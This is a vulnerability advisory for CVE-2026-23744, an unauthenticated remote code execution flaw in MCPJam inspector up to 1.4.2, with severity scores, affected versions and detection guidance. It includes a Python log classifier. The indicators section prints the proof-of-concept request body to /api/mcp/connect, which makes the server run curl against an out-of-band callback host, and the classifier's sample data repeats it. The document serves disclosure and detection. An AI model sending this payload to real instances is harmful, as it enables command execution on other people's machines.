CVE-2026-23744
published 2026-01-16

CVE-2026-23744: MCPJam inspector is the local-first development platform for MCP servers. Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE)…

Priority: P190, critical, 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: ITW exploit, VulnCheck KEV, Initial access
Exploited in the wild
EPSS: 38.37% (98.4th percentile)
MCPJam inspector is the local-first development platform for MCP servers. Versions 1.4.2 and earlier contain a remote code execution (RCE) vulnerability: an attacker can send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request. Version 1.4.3 contains a patch.

Affected (3 ranges)

Vendor   Product    Version range     Fixed in
mcpjam   inspector  < 1.4.3           1.4.3
mcpjam   inspector  <= 1.4.2          (none listed)
mcpjam   inspector  >= 0, < 1.4.3     1.4.3

Detection & IOCs (extracted from sources)

url: /api/mcp/connect
command: POST /api/mcp/connect HTTP/1.1
other: {"serverConfig":{"timeout":10000,"command":"curl","args":["{{interactsh-url}}"],"env":{}},"serverId":"mymcp"}
  • Detect exploitation attempts by monitoring for POST requests to /api/mcp/connect with a JSON body containing 'command' and 'args' fields, which are used to trigger arbitrary OS command execution.
  • A successful exploitation attempt returns HTTP 500 with a JSON body containing both 'Connection failed for server' and 'MCP error' strings.
  • Monitor for out-of-band DNS/HTTP callbacks (OAST) triggered from the MCPJam Inspector process, as the PoC payload uses curl to beacon out to an attacker-controlled host.
  • MCPJam Inspector listens on 0.0.0.0 by default, making it reachable from any network interface. Alert on unexpected inbound connections to the MCPJam Inspector port from non-loopback addresses.
  • The vulnerability only requires unauthenticated network access (CWE-306: Missing Authentication). No credentials or prior access are needed, making any internet- or LAN-exposed MCPJam Inspector instance immediately exploitable.
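The detection points above, turned into a small log classifier as an added example (not code from the advisory or from the MCPJam project). It assumes a simplified access-log record format with source IP, method, path, request body, response status and response body; the sample records are constructed.

```python
import ipaddress
import json

# Endpoint named in the advisory; the PoC request is a POST here.
TARGET_PATH = "/api/mcp/connect"

# Constructed sample access-log records (not real traffic). Each holds the
# request and the response the Inspector returned.
SAMPLE_REQUESTS = [
    {"src": "10.0.0.7", "method": "POST", "path": "/api/mcp/connect",
     "body": '{"serverConfig":{"timeout":10000,"command":"curl",'
             '"args":["http://oast.example/beacon"],"env":{}},"serverId":"mymcp"}',
     "status": 500,
     "resp": '{"error":"Connection failed for server mymcp: MCP error -32000"}'},
    {"src": "127.0.0.1", "method": "POST", "path": "/api/mcp/connect",
     "body": '{"serverConfig":{"url":"http://localhost:3001/mcp"},"serverId":"dev"}',
     "status": 200, "resp": '{"status":"connected"}'},
    {"src": "192.168.1.5", "method": "GET", "path": "/",
     "body": "", "status": 200, "resp": ""},
]


def classify(req):
    """Return the advisory indicators matched by one record ([] if none)."""
    findings = []
    # The Inspector binds 0.0.0.0 by default, so any non-loopback client
    # reaching its port is already worth an alert.
    if not ipaddress.ip_address(req["src"]).is_loopback:
        findings.append(f"non-loopback source {req['src']}")
    if req["method"] != "POST" or req["path"] != TARGET_PATH:
        return findings
    try:
        cfg = json.loads(req["body"] or "{}").get("serverConfig", {})
    except (json.JSONDecodeError, AttributeError):
        cfg = {}
    # A serverConfig carrying 'command' and 'args' asks the Inspector to
    # spawn that process: the exploitation pattern from the PoC.
    if isinstance(cfg, dict) and "command" in cfg and "args" in cfg:
        findings.append(f"process-spawn request: {cfg['command']} {cfg['args']}")
    # HTTP 500 with both strings in the body is the successful-attempt signature.
    if (req["status"] == 500 and "Connection failed for server" in req["resp"]
            and "MCP error" in req["resp"]):
        findings.append("response matches successful-exploitation signature")
    return findings


def scan(records):
    """Map record index -> findings for every record that matched something."""
    return {i: f for i, r in enumerate(records) if (f := classify(r))}
```

A loopback client that connects a URL-based server config produces no finding, so the rule stays quiet for the Inspector's intended local-only use.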

CVSS provenance

nvd:       v3.1  9.8  CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ghsa:            9.4  CRITICAL
osv:             9.4  CRITICAL
vulncheck:       9.8  CRITICAL